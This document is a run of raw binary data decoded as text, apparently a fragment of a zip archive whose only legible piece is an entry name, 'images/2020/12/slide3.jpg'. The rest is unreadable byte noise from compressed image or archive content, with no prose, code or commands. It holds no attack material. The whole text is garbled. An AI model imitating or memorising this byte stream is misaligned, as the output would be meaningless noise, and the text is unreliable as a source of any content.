^��3P{�d�x?�Ba��NE���^�8F>�В�_<�1?��Z,v�t�eQx9w��|ʇf��ߘ��=�����c۠���l�T��4{Xj�9;~+le7m��Y��A�e@�[��@X�kڋF���{�϶`�nY������N3�$/.��y�0��OJo�W�L֡���D�V����e@���@4gN?�_��=�[���DW�����)B�J�1_]�& R_�<$���A>�����m�mC��rt�_�
���[��x�%��n��!��χ�.��d9_�DB�{���/׭ijLH�q�{���>�M�W�W��V��vb�q2r"�%u���T
,�X�mmB��� �����&�}~�ŵ����Bahz$�@�V.rE���������wܳ6�T�#y���n�b��چ� G�-����C�YZ[ڪbC�!).M������
�ح�\�oE:g�a�Ղ��Q)9Gf�5�����IU����[�����,U��[�Os�����GC�,W�E"Ʉ�V"P��7-�/��v�?ji�^���}Y�`��:�`���`-aץɌ=D�D���,�(�.E�i;f�{��	nyK��Dۥ���,�~�݇"k�M����9D��)Ot�������4�~K���$��5ŏtfoɳ��/t�60�L��{���<ⲃ�B��-R8��i��mA�..j���kH��V�M�|]�iL��8���L���v^�dL��<Ȩ:)�T��e���~S�q]���Qڜh�
��)'ǽ.���5ZG�O����l�OjC�L��"I@�]-"v��k�'�K$}������B°(��n��Fs�Wo@�4W���������;Θ[D����B��Pd��Y%�_D�%�_?�%b��5	/VҴ��KKi~�皘J����Z�G�������ݓ�dXS��I�0^�Ŏ�6���:��^��=�(-�B�o7�cn�]��8*��k&�
��䎶�|���3:�> �{�h&�%@.�����q�>��+��p����R-�iZ��t����в� lUg%5��0���i���zry�4���麻5H��y��YX���n}�$���
%�[o4���7��L#�� �L�+���𺭺W>7s�DL'�݄0��v��%��}�#=(v@*M����?c��i�
}(/a��:��9�g�2Nx)8�<3.�k%��s���U��Q��IrK���0�Ͽ+!yo��5Ѫ�E�ۧ}EO��Q�D,��V.�JP�v�oHĬ��	���X""mځ}��y�hY��? .���R�Y-Q�g�¨*й����s�Fs�!#�������-�LX8y����"a7�;>w	��\A�Wu�vM�%�����t�9_m�3�ĩ�W�����C���d�:n,懡��.�(��!��O>����#}�d��;ߔѥ�y���+k$or�]� \]�b�U·�༿M�iS�m��𡖙!)L��OX��N�
kj"��Y�)c��o���c�.�B����,l��Oʔ'�;ư�@S��^�d�W���~�G:}ԟFm��mߢ�*А�T�w��{� ��������1�DV����h�A��;xD@�R�
m�0��B�*��>;8�Şs�H��4n�����-5r�w�B���Z\ǥM̦���Qίǰ�"9�U��s|X��^]@0��Í��m�l��*n�2ݾO�(F�.�K�k��_K�}�Y�=qMP:�/Fz�|Q���]ϱ��ˮ��^p�3���@V
!*Q��&��V&�d&����]��8i��b�(	��w�N��q�ޖ�������k��쓨-Ӫ#>��f��t(�Oo�y��U��w������4J���u��8ɘ�	j�,��5co߉i���\9�|f��ph`;���y?�:ݲ��β�M�|���GNU�$d����xqb6U�ٲ��?xW:-~!l�!� �k.q!)�KO��s3���Va����zGj��FP��� ���o�Ȝ�u��0h�R��l�ԯ1)VDib�b<��h����KR�e�X��qEgp�kT���\T��5Z$��T�4�Sɖ��4��=@��I<_k��'<w�h�Q���`��ƪ�b���X������֚��
��]T��u��(%������s��'!���%G�/���޾�,�O,_�}2o1W;>۰�\ܼ�&�1�:�P��w�/�y��{�G�*�%���X" �G��%�d�\A[�]�⧎=8�B�:�}�`_	<\��%L=S�*�9�y=�}Z,��"p�Qb����> f�(t"���5���t>4+fpU��w��nŒn�}�!b�b�isԖ�'��I�x�)�yGڱF�}ܥ�b�Wu�%�a�-�ܤ{�-��r�H/T0
S�����i��'�9�_��q�(�8��BD�D8�0����1|Y}q�H��ʹ��F㽌=��6��+u��9���C���#o̝/&��>�,y�q��؆��u%�}ذf��x�`�qY.��=.�3�
��%$��i���p�"�Q]b[�r����
�Sd�Z`?V?Ovru�s�=�>�*�>|�����dF���#ш:��Ѹ�ǜ=)1z��J�L���;�Y���S�p�?&��Tڝ�{s���:"��zp��7*%bY���c�N\�ʠȄ_��J�w4��=�$�x��v��t)e��ܨ�!Q��>/����F�^������6�	R�Q���ԡ����D2��-���9Uz�A֭��J�a&
g��[��TB��w���I�ّ��#�?���m{��	�.�H����xB��0b�0������?q�����s�J�떭k��S��U�^zjفP���K���³1�C�	k!>��vBʉ'�>/�����||+-�b)��$X�9�4v���!Okk\��7�h��/��Ȯ<~�����V�f ���u/������Pc�~jͪ�̂�~r��>��+�u�~��[:��+k^��o��jA�n{%A�-ҷ2Ƕ��j�h8��v%��H��*-)ƫ��w��2�tn<"�!�di���K����e2���~�����}����"�vV�L\7RDB�*��\�{X#$�q��f)��I	e��ʅ��4�΃�>����G���Kz�����1�ۥH�x�|�O�"��/�{�Aat�A�]�*T�2� ����}|d7����J���i�>*�k�'�m��M��E}O-�.��%�7 dB\�P"��
��j��ؼ��y�����Ap���@&A2ﱮ�K^A����������P���'V�?�ʮ�\*#qD���Jr��g\k^��p����ɟ�'��6U���U�+n�6"X2����Q���N�;w�/�P{)��4���z���imf�����ϭz�	�07�Ǔ{t�.��B�0M�%5_bt��(��c�E����x@���
�K&H�R�ZG�L-�R��L.�_�9<�?<VW�_��sn�@gH�����CR>�y�r;��)<�7�%�O���I�XZܬ���M�|��+I����U� �<w�����*�(��jOf5�=�j{!x�;�H���E��T���.���=�Oa.s@r���*#*
垴�J�����m`>RO�{p#�I�#Z�47�����9�oA&c��5����	� X��q҂O���L;/o�ǃ��Y�|�ՠ`x�O�є��A/!{dż��&�;���Q���Ay�K�2�J?86OL6���TۧCu-�5�K�qA��QF'�|J%��D	z(Y���')g<�C�Cbٓ��:V�BH��4o��,)���98Ӯq�M�v��I���$D:����L�\	�㠱q�y��O2h��x���}��`<�I���z�ѫ�;n���:j/�Y���q(w��叔�N���і��Ǹ?�l��h�Ko�wI�9,S�I/"��}L�.�
^Q���O'�FK��e�_���?��DB���U�n��o.ߪ�8
��=�p%��[���R��T;��/aaA����ina3��*��(N�l�w���v�=V
>�C��v;�s�d5�D�q�/95DZCp3i[*i��8���D�盺��
���/R��cנ��)�Btz5��{�[~i��z�/�^��lJ%1v�Q^%��r�#p:��!t���1[�#A�]Jȧ�꟞\�'��W嶉H��<�[ ��%3�ȹ��G=A�%�ӆ3��q�
�%�"�1�+�gq�n+�d?ojG��;%B��D��r~�Qʛ��z���i�^��|�@qz�4i�*l��n3x��ޭ�J�T�]��ۤ�#ǹ�odo�{��O|��A׫��=��6���
��8���j�L�偺��J�e�E�s��>��ڗ�vQ�I�숽H#��kc��ȴ�*��}�Ʒ�2�`]Q�.�]cu�n�A삗��6Q�Iޡq�X�O�@*a�\i_����0M��}��P�)Үqŏ�Ց`���u[�o\������4?}�(��g&"���6�|b��[e�䷣U��bQ�hΓ��ؿ��
:�`Y�3(�h���"6
҆��
����Ŵ�g܉����y8��g���,Fd@�M��TG��3�H�{>�[(׻PltSK�+x�I�Σ��B��/�̷i|+)�⭘^O�ը�{�m*�y��+����۸��^��D��6x-�b��1@�A���2�L;O_d[G��$�x=�%���AUT���U(Sޘ��r4
��j&Ee7~(I�̏P���]����W"�$r�m�D6�-
�)p��ym�u>ۄ�s���~m���RY<�{}����y�A3N7
#�—�����x�m~���_z�#(�p���yױ���;���;�b)�1�ΤL��D:ON@z.*���1�h:�HR,p>N/�]�����4��;A&��%�6�z��G�־[�Q�����B<��X�#��qĈ<I���W���-�j�C��û��D����n 1�R��  �V_����C�]����O�;�K4����i��-��X�ƙ��sV �����8��-���J�����)����̇��\l�sLv�����A��u]���}��Ǻ�t���\�C����o|$BbV.�Ga��1,�w�J38�^��;5��
S
p�!�H�_��r���!<	&9��2a4��}Q݀ew������λ"�,e�env �dvW���*��?d?8"��JE\��z��2m˿H�Z˂D/����&&��b��L��O�H3�EA��<9�z�M�A��7�ד�;��eO"�Sf�ŵ>�t���M������Ř����ĸ�E.dR�Z��OxA��"Y'M��
�򩭿Ӌ�B�-��7��k���	�!�K�M�g1F_�7�U��H�f2��Տ��E��B˦s���1b�&��]B ��CM���,�RiQ9lF�f̏iB
�/���f�Zqb�'+��*�}�d�ٱ�|�-�y^�X8^�/�L���%#<ຼK�$���DA�0hR��и!7�O!�ר�)7�OV(�/$�.��9�E��rT<�@P�=�W��_r�s�)iz����B�"μ�o[#%Zp����ᓳ\�&ס�-ݡ
���ba{��؇���.0~��3y��f�{عY��Hi>J�!f��H"�H�s��^<���0���r��s�&H��i#,��2۟���i����[�"��[�dJ�n~?R��LI� 4G:N���<.�;W"��":Ǫ�1�vק~�M�IU���ȕ�H�a�l�7���A�q_��ĸ�����.��K�v�U
���Q�Oۯ{������K�sAg���X�K"�q����d���&�:�*p����������O��A}�����{A�P5}V�O��{#L^�k�$U�!�l]7�jӜoo}�*��������4Z�ں�w�޴��}c6p��$n�H�%
���	������e�{*����6g:^XY���U�^y*��������.{Lb<�P9��T$�_WA�Sr|��.�!���߫J�zK�}&gWM�!�%���c\��P��`V�b9Ƴ2zxf�[~�>�x_���mY�Bʙ��'X2G��#�XU�{P;�͢��>g���f�$Z��l��1��<�H�I
!E��r��@�_������0~I<u��� �cV���l�M�G]�tH��
>��<�����0ľh#�ځ��!͙P4`@\�%5�4h�m��S�*�3�	�vT^��qH
;r�g}�:'S�>6����7Q�X�.N����\:�r�ꚶ�E��Ӊ�[fQc�]Cm�݃@}�IhAnS�,�����m3��H�?���J�Rb��t�t�Ħ4t�XMw�4>Yp;N����<y����X٘I2�I���_󘹦�|E� f:ї	Q��]BJ\�����0�508lJ�ҥ��VpO�D���(~���7q��#�f@ ̾� �M<�awv;Ƀ�A�&2ξ3(��wkb�
�բ��z�o�;���M��T8�q���Х(d��N��Y#�l��G��W�5ű�H�(�e�˕�[,���e�2�|���'�#OZ*�kB��D	߱�U�p��w����W�L#�� �>��$�U6Ȫ�J9�8��R���f��;ky����=1�f�PK���Q�M8��images/2020/12/slide3.jpg��Tk�6:TQC�z��{	�iB� �����{ ��"]�AEU�*(�����|g�3ʂL晹�u_�3��_�0i��"P���h4�`�@� %|�!�D"���@^T�%r���	.�/p���(����	�ew�#�<�8�ڻ9�ݜ�8��
�h�]�t�|�w���aAH��3��2�b�|������{x���8��\���nQN�?��"�8�.�`�64a���K���ĥ$�e�D�e��$���%��eE�dE�%�����d�%���8	W�qv�7���Z�OJ��(���C���"^>Qq999Q1	Q		a�¨@O�{ž(���A����=�u��d��|����W���?*���i�_m�?44��>��F���]���F�>����Q^~>08�p����5|�|�|̽�<�cEW/_/���v
���f�r�t�z��3��P���	�C4�8	{D�ܜ�5d�e4%$e$����ŵ���d%4%�n�I���I�k�g����>��?c��;V�{�����Ý�}��Q[���E������,��XQ�0�������A����?ܓ�>���+���Ԁs!��H		9%�[��@�]�k�.�����]"'�t�ᇚ��%J���U�?��i������\ed�~����֭[�\�nD׮\c��e��D�t����k���D���� �!"�!��8���@DLBJF~����� ����������� ��MCL�%e�S�#3y��&A�Š.I֐⦹FFJFE����p���LiI��ys��>N�0q,�5�nFG����'�p�z����
�O`(�-�4dd�C�ρ=4�@���g%"!l�$�L�p����M�y?VM*4q��m����j�Hh���T����9�м�"�M��r���-��L�lfLk4������@������d'���פW������f�(�+�;ir��z�Z���ߗT/���ӳ�I��c�9����,=@K� c��hj���r���|��a���"�A)�AR��.u��{iku�P�G���ڐ*<
 `����x�v�����/I/v*�z�{%��~`�^Nt�/�O�5f�"D~�}�I����zP�9���P
"�b�FX/��MT��_�Z
��H�P���(ij�!�3�d`�Ǎ05�r~��PFY��1��4�T�����O5
\�	���o+�3�����*�?����|�oۗ���"R��Q�}sU�/!/O������ӈaGU93)�!�WT9�]��e��Z�R���ŧ����*�Y��V=��b�B�w37�]����Ҍ�ϒ�ͼ���pRg[;��Ro�U��#���`�>e�2ŗߍ���g
�dC~�O]Nج��5�2-^w'_�t!<��ΊP�ᬯ�Ȅf����z��bF������kF��EkB��h��'r�wj*��?c�3s����9	�O�F�L.��]�o���!|��D�^G�1>�F���_�"�?�g���_7���iG�]�j�:	<>��o=��Ҁ�f�0�[�*�-g�	O�(�K �.km�0vW�J�V�s�7�U��eT�����’��*�2����Iaa_&5���L6���>j��x�������3�L�D�moP/�n��(��ڢ|V��b��G�S\�
85�2n��M:O���jh��z��g�dR�<����_fv�5$����hz@�?�A՚p�em/�+�'o1�]
�}  ֺ6�&���~ B��dsir�s�`�-ETh�Qh[���Ji9=,��f���B��##�������!� 5��{�*W�z={���3��c��#�
؉�z����Iǵ�%�>Hh������,��{�}�[�㛊�x�{��#��o��mǼ.R(խ������ΆNZ7�CԘl]v+祽S�/"�)Z�P�H�eg�_�zzA0��>�]�{�.�t�����Jע�w������ �߈n�fO��R�ͳϕ,k�C\�M�E�t�'.���WL���\SU|�U(�n��d��}x�3$�y�5q,�J�Fl�G;;��
��Հ�T#��7�~��Uɉ��`{.t��U��G.����\T45����xnr�V�>�	��A�ޘ^�����tc�KS���I�	�pl�U�I��Ӑ���6����pX��
9�q�U�wl�{
��x1�������~��9:�{P�`P�R�b���^�9=�R:y�Z�A�W;�?������e	����x�̻�X`+(�is�[�D$�
V�m_��*�y����t+�d��9�f�l�>����/�R���uQ���3��W{�T�~aS|6�M7����o����䂛�g [�e)��^�WHꢶ��v��M�~�T��p3Å��-�F�t?&�m}�ϲݟar���D��2��MJ�ͫ@�%V�>	}���C�̥�e�v�~]�32�<F�'�����.JD��D���s
�yz��9���fU��5�6�7�A������n��7��T]�4�}��4>�N��_��M�r,ga�fɲw�|�{G�}>�|���	��۵԰�Vl��ϯ�)���۬;��2�ZW��n{l��0��n��S���苈��/M�T�p�3Ĵ�ˏ�)��C�Է���X�1ц7�]{�c�Hi�Y�Mdݰ�5����,�ffƴu4ៃ���
m��-R�S��N ��₠?Z�(k������Y�
��.�J�݅B��rl3�(��ƆF,�O�@.�O9�/����Aelk1�Z�]{���C'D�S�׍,�.��r�"؋H"���\} �0���F��4�]~}6H��U�A��0�ڤ���/��U}
OV-��=�����\��ܙy�=V�����l)����4�VTU���#$�9��"�/���4��O]b�)���bh�)]5�	+e]��
����7�}9;B��OjmJ���Yv�pj3пt�Aٷ���5�0J}��WY|vɈ��!�|��+A�pq��޸4|uF�lS�n���3�0�2iN
F��"lO�H�B
Vˁfm���C=�Lu��I�}u�{�Q0b�)�>�H�S�>�246	k1�ji����q��/>����������q�|{�X��mHu��s	t�=#b�c���[��չ6��z�D~D.��-���q���aA�4���0�i�HN�0nBy\�?�w-�(�4C~��˲�93n��`�1���b)b#;c}YN����59�[9?P<W��q��j@O�P�_�-�5VL[�$���y��I�?���|�f+O����M�����k^L�򤼼о*���R��\Is/�	Q�NI۶Q�G�߯:XW����D8������E����Z��K�v��06�/�A���}dZ��cų�#D��%����K}f�q4e.���8B	H�^��%�%�%!�$��ifD
2V_��.�D����Wɩ^�Edk6]kc���V��"֨��@hS�x�g�DI�V揖��:�"2F9�Yoغ�>�Vb�z���[��f.�tm�(�Z
i5��U�<2�׿ � ʪ�);@uz����EI"���vF��"�Y�WD/5�'۞W�+E�_�>5�O��\,Ʉ@�zY��0J�����l\�4@�i��C����\�Q�Nx��lN�`�ۋ�)�B��#�zS3U��a���>a}S-n}
��&�R��\̖@��'���Wץ>�*��/�2�yw�[�g[T���1E<l��]8�[���i0z�s�.���^�.1Q��+��-�]���X˖�է�<+�ܩ�쮰��t6m�Z�Q�Gl���X��œ���+���a
`���y͗p#����"\.!�O����b�B�������F�Rp}}5i��Ҋ"Lj��G�Ȅ��t�}*#YkC=m��<d�(,�K���"�F��g�KC泇�s�K��nf���<&�%�5n�j��}�؞�N�wq Ј|{�:��k�\�_��1>]A
0w!��H�{F~�	,���H�?LXMUG�7�&��a �8[��}^cgɊaO�4T���K���_���?�+iG/�u�̜��1Lv�Qh𵺹��X��'$(�8��,���o�hN�Y^_�f�<��V��n�7?Þ&ۇ�{#Ӧ�"B�z%��z��[�e�V\��q�ԇ������.�3� S�8���@<N��
JX�����.$f�(7:U�%��]5���:�V����|�|�j�:�_�
P����Ų��7��\��eC���B!t/̣�'r;��T1iXn��G6�a�3�Ndbn��eYk��\i��R�C�R�[��v������}|�N%��p����k�ǜl�zZ����#�ԂW������З[τQLJ&���*��-}Z�&;�fܘ|�r��~�[���b6�l/�Rb�I8�=uί�ٜ�O���l�'�.T�ۥP/P'�"Ff�E;j���i�l޲0�|rqn��@�*	��M�RѠ�N��r���G�QP1���4U����3���� S
�$5�m'�#�FtO��3�u{|EIrj�;��rƴd�gP�ԝ�Y{T"a��{���X[�3���>�R���9��PQ)$7 ���mx�e���C���!�g�o��pKW{׬������a�e�{<�j�u&�C����P u	�v�x
�7����@h#ݕ�����9�G� ⃌���&�Qל}ŵf#�n�VV�/���!��&%6���.a�?LN��������YQ����l�Ӿo�y��d�昧ֳ	9{��lJS�k��"-A��(ǿ�e�t%�vߛ�/[��r9C�M\�xsdW�ȏå���7reB�?�r�������s���e�����D�*V�@�]I=�_��Ͽ�{4�Ӄ/��#����W���cm�ک��+X������)R�^P?���Zؕ�^��/��
�0������V�!��/J
5�2�\�}m%�v�$�?�;n���dO��X_��Q@M���Sc�1
M٭"a�!JB;�L��o�P�n΍�n}�5����W�0������eNQ�Ӝrp�����D��n��4YI�C��ź������@���(,1Ȍ`M �đ��)���6�ٸ抶teᨉ�q�om*~/�úGGn��o��$����0nC�x*}�لY���ʹ�3���'S�U����1q����(�0T.vk>���_��=]�yj��e&�XS���u��a����&���lv�_�T���F��#` i�����f���lu\�H,�7�^M�ςܹ��u�37�$_7���;�<�ʨp���S�h�L�EOQ��)�
���T@r�HB�UMD�&:��q.�|�)L�����MAeE�> h�R�ma H���֢�k�0��d%n�PWb��뤰�k	����1������e��v������x�̩��\���q㻉a�5�Eb+k�������"��͵��L�����{5ۅL����{�s��ѯ�F���w��������AV5s�G
xG*b��m��!��.�93W]B��Q�Dp B".�Z�-[7p:���2m�R�"��R���QZ�n�srq��$��2�+F
'hχ�`i(J�&�J��pM��حa�+�-h�/)y]�=�x�氂��Pt�h�j�*~�wez�mI��W����m����lű���ǒ]��mM�#+������6�� y:�ө�_�D�K�q�ع�>jnxEBB��	���Ȯc�g�K�O��Ε�ՋI�M�L�	�"	�� wyB��L��kF�x嶊Kc'�[mC�4��P~F�Q�ƴ�O��z�QI��$�(*��7�ZW�|����Lh
���C����BI,Q!K n�7��?�����l�����ޱV������5���_�\�T~��h^k�b'��r�e^X����}\W����j�ډuV�![���7�jp�~����u�@Y%�M��we�[:��>H�AI��Kv�Ⱥk˯Z��~y�׵o:�ӂ���p����_�?s�}Ʌy�����|��u��"�5}��ϼOiL)��pVF�ЅqE1"®p�Rrbn�*;���:xo�{*�#���4pO�`L{��Y:�����!/#�˲�^3ce����E�Lq\�womζy�A����j�|B�=�ٺ(����Dx�A��Tyzm�AG�@��(��b��9��_��~�7��\DL��=
����R\���g�.�/^�=�"��QX����fc�bX*�A�4`ZC���ǔ�L���%bE�=J��-��Ɏ��b`�
���V���]I�5�C٪�z&���h���Wb���b6kB��ݰ�Cͯ��}<>���l���"��koyŇ�W4�y��d���� �Fƺ��y9�_�C����E���e��qz~es��p��|S���E�oM��r RSE_L�'\�+!���;@�jz|�&��@=�N0���@�!_��+L�xjj��e��HD�V�9S�`3���6xW����h�+�Y���د�Ï�*M>�X�7��e�UK�Ź�W�#�ʼ�����O�G�Oǿ:ٚ�7��fʍ��PK�ބ�T)�m���1���O���p�+5��*���f�B�O�DN|m'��J/F���D�+UP�c��1����;D��>��a��L����SN�Cw�F�^Q4Y5��7�`�f�R��}6���M�æ�4�O�n)�A�/;�Hn���>>(��pt�ɍ�'�v�(5Mz8b�L1>0��N��ß�TN�G6�go-��������ǧ��E��L{I�8R�Ss�����K��JW׿:FN����%���y��?>%�LOh�н���"I��;9ص�@�wOF���KԀ:�����#
8�LS����?���sWX�>Ť_��`�H���k��J+mil**�S��L� ���Ӯ��R�PZ��f���v�P؆��|Ҏ�Ⱥ��z�=�{�eNE�b�S�iL�}:[kU5����ߤ�{x8緇�����8g���)�t{�3h�j��׬B���ls�;
{��iS5|�h��L����CT7w��.L���	�?�pi���}��&G��sP4���1���.<)Zp�Q�QGա:
�l)�j�>r�~��X�����a��&��a�D��#�*����,4VR�u�E�t˦�s�=`�=����m��O�o���\0|]5^����0�R=���_�k��ʍm�"��麋"W=��[n�#y�h^N�y��l^��s>��Őkb٬�-�_܉"�xI�� ���Q�ۇ�&�-ѕ�il#�&�*uAA�)�,����l!��qp`xO�J��P`rr�h��M�i�YKP@����b�&m2m�o
Wer�,"N�::�%q�܋
����	�G̶g�W�5�s�W<f����]��qlH���C�Q�FP`X�@�#�A4�W�z;
�~����"�?���Ll��z�+����^��^>��A�����;�cG�UY���=d
��������6���D�%9�lj(���TI��Ǽ�(#���f-��I�����R6���f�T�<e`�;L�a=k5�_��jB��X�����o�o�Pk��A���Ғ�b�?'&Y?�98����X8�A`��2s|��ڮ���PX6��0Y��tmcpf�F*��ݝ<2 ϋy�K���V����06��t’��,m;"h�����~�.�}	�6�]|D�)�:�նx=j�?Z1��c�
�����/|�t���T�o7�ؙ�V\��d]���󎟣n£Ҥ����aTg�Ea�0�)8�ۥ$j�Ez�W��������]��75��X���|7���e�H���m���������7��C�%;���`rx�r��9���C?������c�����:�m=ˠ��3�O��3Ls�Ii�Ѧ�i�1x�HD��J�o۹�hO�+�8�����
���g��rԥ��y~�\� 
���l��X`ָA'fR1�:��41A�P�f���������(�]�\Y����B�-��|\�_�hI�Mߤ������<�1wö���W-�0�����WG@~}3�Z>�ۥ�f����6��l����Q�w�r���rk.f��k;eO^�,�6r8�{�7!;/��V;y��L�_Z[:lߐ[n�[��7'���
RWQI�����MY�>-qB�|�|k�a�J!G�}�A^(��A�Q��y��J}�����	�P�P��Q�c6�NkH)v�Ǵ�2��ѓѵ��>
`��!���A���k7��ʪLm�[|Fs��j��|�|��@����!�XCB`-��"�u�a�arXd=���դ�dH���j��0�O��h������1���b8A�k�򄞫�o=��q�1�p�b�OoC�Y�Ͻ/�<�PƋ��)5�U�O
������+:�,2�~_WXD�tv��/��_�p�q�-�"�V+7�Z���hܰr��1<��o�rPSR\L543�t�n����ٍ�{@��P{bU=�i��{qkv�!���Q��2@@n��p
¼�P��e9�1JZv��I~�ǔ<�N���:e�l;��ǖb���%\
բO��.����#y*��ѕ;���c�<��%r3�$�s��Wd2�$�f�+������ۆF%���6�Z����e׏����:�J�S�m�S�"�x��{�Ԋ.gv��&mKb4}���MK�t?i�Sq躙P�;m�\��l��m�q��z6pG2T��
�c8t�a����H@LB�ӛ���Q�r���8�0��<�K�\��z��ȕ�e��W����h6�T圪9��"8*= rEw��JdX__�����L~��hG*R@��m!V����"so�|���5�V<�<ֱ����q����.ۭ����,�9�%"�Er�؂].
	�ܼ�R댔�/l>�x����= ޝ��8�1ibe������b�|y���w��N��M�o(Y���ф̙u�w�¿~�-@�:��C
"#��ΘGN\'2G;3�Ax`5L����ǓO�n�f�-�4��eCS���ƂBZ�^�
.l �Nс��M�U��q_qu���`A�9�����z!`
')����\���N�}4�=��NȞn�s�\���5|Ü�P����%Ee��#������!�o*�\��'�S�Iu�y݇=�QB�j�G(���o`��,7;�
���G�/�Y�A���I)��/�ϱ��e^�YFݓ�����'��AkeQ|�A�H��8y�Flq@���u��3o�z��4_�ۆT���1���+�tю��Ttz��{��ڂÄh� *&��_�_��Y��&��0��D�m3��Սc(h3��?'�V��$�ŋ��j�	��5蔨A��0���q��uN搿9�4`��J����8�����,�/���Ƌ�5R>=��<�\�7@& �\��W�g�(t4����y'� w��%;gĤ�.��ҙ
~c����Sa{bj:!�G���T�:��S �Yn�J6!A��.&���Z|�6�_��x�2�>u�hLH��M�� ��Z�HU�tx)^�fa���jq����L��4;��5�n4_�&&üĒW8G��~���*��㟿��F�h�nH�I��ٞ�T#��'���r�>=�Q�p*Q�Q3N�"W�qma
�e�t�/+��r�_݄ܐ���>s��đ��A-)p�F�\��l�������B�hn�T
U8�u�;�e�i���;��BFg���W��]�*Pѳ�H�ϒ! @��+)�^+�Z�wv�zţ��DRX���3D��X[
���E��Ej��֓�S|�����%����n$Axu�H�sf��u�DYQ.�����M׾���3��~�*��М�am� GsO[�'�h�0���j�4�N�rMs�����2��*𭲉$!2ǁ�o?�,�5=Pѱ�"��/�1���n:�Ck�0�5��u5�Ar�����F�����:Ls<~�[�B9�fQ=�{�ҟ��K�s	
3��}|��ʼ�A��ބ�
��R2T�������-6h"�va���I�\���`�2D�ٓ(,�QI�$(�K��wN�+�˃��kR��u��t�H�zc�CA��y�;��s����$������.��	�]��_Ż��cA�U��`+����m���_��:#�>?�P8��1!Ԟ6�e͆}��\�����N���F[iu���L
S|zB�V�L���� !j�v��M.FH��=R:]��ŕ�$o� ���x�x��co�Ǐ�&���/0�at%��3k!�e�<i��fP���%~Z� ����7�k�G��1��]|���#9:T߆���Q;*���Ϥ,%0�`^�;w�Lq���B�B�3�n�	����#�4j�Y��/.��bӇ��k��$D�
�q�ׇ����*�c��l���R�_��ѣ�r�zj�*�
��Y�O�v��]-�/�.��>QM�@�.��\]$1o�~m(�%���/����.L�>�@�g�=���R���1`gyID�:��$e`֗���D̐���[;��jf
!���U�4�Q��	�$3�L?G�FGKG� X;h���m����=�¯�DG��w,���.�,>���B����#�&�j\���i��ɥ��c�o_V�j'J�@�K�Ǒ&Ce$j��@d�']�K�"���zh4u����f��|n�&�?%R����"�/q�>��_?'=�I�z�����f��򳲊��k�R߫�&��Ý��.Q�/�i.�ad���•� �b���t���f
)�R�W��Ek)�TI�n�j����r�cn��J2DC�&	�^��=���C�nM�~�(/��W�IRԬ�DT_�91֕�X챫�ŝM{���-_2k�b��0k��
��Չ8M ��"��|�.�M^Yr���If:�\�#���u�p�	m��e6ػ�B0-����<=�t�� ��^-ə�ZͿ�vE�+��#�R��U�A_ul
2}�f�t��F<"�i3���6�>�o��j䗪�c��n��j�HH�jf-
B��.x�JA�lM�a�q�U��w1t�)W���J�mt?�G�	��۲mF.���"���O�~^�u����єe�N��_}�
J�tʾ7��ډ����j������2�^q��\�)����&%�i�)��R��\�=K�q'���ڱ�L,5�t��;�e~�h(T	D�zo��slj��<y1��Os*w��㦦ǵ�Fg%[��g"�4.ec������M,�n���%�,�WcT"i�\Z$m��&fJK���i���Y&��R�����$F����rp���eat�S,�r�cH�����y<6ܞcoN�nf���$�tx�e�/��l�W��L/эg�u�t�������C>�����S	T�$0@M~�(�BU7�T��z���G��t���j��&;T ��T�q�eJ��l���x�`��B3P	��bG��-����7[���]���(���3��9�@�a�P�'��R
c��q��;#�<~Y�PHk�!B��]�����jB�]C[������0�r*"~];�_�9�,|N�49�%�aQN��횛�K�FL�M���jq|f*')���_M.�o\�=,w���捕�_w�υg�M�'�\�TvG�1�A_,��HT���CZo�0Ԓ��R����?��)`gx9	a��W��(�ū�H PL���,��ڬ���^�+@�5Ɔ:���t����<�R�M�L^'eDRkn�b5��1d��x{٨	W��>�E�pЛjQ��(@M�X���H]('8\�S�t셑���P>�u]5�0K�
{2�<�f��!��`���7
�(����|y�n��يJ�K�כu^�S���<G�2�EW=���Ub""NsN���c9m�k^yP)�s��{�߲}kP�x�vl�	��Z���Bk�0hd� .�LE!\v�+XO|�l��hRNA�-@��`����+��κP�47��\��m��
HI$$35���	CE�1��
L�� Efv6v�v�)&[11�6rv�x�f�1(���@��n����ɍ䔋@�kT1�������5Mc*~|����NWX�F���x	���~�-�.K���8��V�}s��e�����3
*r1���^���ck�	Ĺ�S�bZG�V�⶝�m�Uq�~�!��&c���j=���5c`W5gfm�~8'p�/�hd���P$��X�\E��Fu�����jJ#T�����$�6�1�[		���vp2�E ��qU�b�0����DQe}�@x�Un*�
��`�d�$��5C�=�����q:!R�s7�ۑ�|�4܉}��2�
*�g6�J�i6!�wr37��-�/�B='��?�w�>.4}���G�451�;���T 4�W�A�"jw���rw�,vF9�G$k�y��FY��њs�>9e|��c���R~��z�j%Jq�p+kQ @ �\��l����/�'r�����M
!�$��J����KN�dx��*!���4�5$��T��<��Ob���T%�t��_Rf.�G:��B���K�ʨV���y|�lHn����=�FǺg�{Y,�"S״z��x<�#!i�:�?E��O��H0Q��X�6����u���f��E�X$#��f�ė0�3e(�S�{3":��P���Y#M�"a��7E��DD�P�x��„K��Z@�+ICo�JOIF&v&��Q���¯m!���*I:�͟�!�!w1;\i�7G�A�J�J�S�L���,M���%1hP��n4g�.v��.o�@�X�j�k9d�x*�������sF�&SU-ׁ�2�\��wrT��̼�}�Z��f���)��x����i՟e��3�;�z?2
 ��̧񃌃x��=HiN��ˠ$AK��a�9���\���PZ��}$9nGr�C���\���<�S�)N�Ζ��NXe)�r�m���܌X	�'͵1����z%ψvdPB�� )��R�vŒ�JO�_ۈS��*�IK�fze���:R5�B���F��3��[g2Y�}24����[����JG1,ݡHG�B෱2�&L�_V��_��B@P��|��m�ң��ݒ
� "���gT�I�{�o�0�=������7k�\����V�sFi�ɨ��i_H%RQAl^C^o{0�����9㜘z�Z^�7P����Z%꣱1�Dc6���s)�+�.�4
\UL��pљQ=��4@���G@2SPM����L�z
�[�R|E�!>i(,�@�El�b���3�uvB��2���pюp-���}����+��}=���z�=����_�_�������\�js�w:Q֕�3Ŏ��A ��h|*�mK�	'���ӟ�R����,�3sḬ�۝��Arˌ�A�L~Z�*&�(8�6Gz�#��.p�<C�F|��#W�	�c�Dw��j�{QT�D��Z��y�~s�z�z�pDeB�]��x2u"��$�R�Lh����I@��
